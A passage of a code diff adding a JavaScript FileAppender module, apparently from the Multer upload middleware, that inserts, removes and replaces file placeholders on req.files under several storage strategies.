|
|
15
|
+
case 'ARRAY': req.files = []; break
|
|
16
|
+
case 'OBJECT': req.files = Object.create(null); break
|
|
17
|
+
default: throw new Error('Unknown file strategy: ' + strategy)
|
|
18
|
+
}
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
FileAppender.prototype.insertPlaceholder = function (file) {
|
|
22
|
+
var placeholder = {
|
|
23
|
+
fieldname: file.fieldname
|
|
24
|
+
}
|
|
25
|
+
|
|
26
|
+
switch (this.strategy) {
|
|
27
|
+
case 'NONE': break
|
|
28
|
+
case 'VALUE': break
|
|
29
|
+
case 'ARRAY': this.req.files.push(placeholder); break
|
|
30
|
+
case 'OBJECT':
|
|
31
|
+
if (this.req.files[file.fieldname]) {
|
|
32
|
+
this.req.files[file.fieldname].push(placeholder)
|
|
33
|
+
} else {
|
|
34
|
+
this.req.files[file.fieldname] = [placeholder]
|
|
35
|
+
}
|
|
36
|
+
break
|
|
37
|
+
}
|
|
38
|
+
|
|
39
|
+
return placeholder
|
|
40
|
+
}
|
|
41
|
+
|
|
42
|
+
FileAppender.prototype.removePlaceholder = function (placeholder) {
|
|
43
|
+
switch (this.strategy) {
|
|
44
|
+
case 'NONE': break
|
|
45
|
+
case 'VALUE': break
|
|
46
|
+
case 'ARRAY': arrayRemove(this.req.files, placeholder); break
|
|
47
|
+
case 'OBJECT':
|
|
48
|
+
if (this.req.files[placeholder.fieldname].length === 1) {
|
|
49
|
+
delete this.req.files[placeholder.fieldname]
|
|
50
|
+
} else {
|
|
51
|
+
arrayRemove(this.req.files[placeholder.fieldname], placeholder)
|
|
52
|
+
}
|
|
53
|
+
break
|
|
54
|
+
}
|
|
55
|
+
}
|
|
56
|
+
|
|
57
|
+
FileAppender.prototype.replacePlaceholder = function (placeholder, file) {
|
|
58
|
+
if (this.strategy === 'VALUE') {
|
|
59
|
+
this.req.file = file
|
|
60
|
+
return
|
|
61
|
+
}
|
|
62
|
+
|
|
63
|
+
delete placeholder.fieldname
|
|
64
|
+
objectAssign(placeholder, file)
|
|
65
|
+
}
|
|
66
|
+
|
|
67
|
+
module.exports = FileAppender
|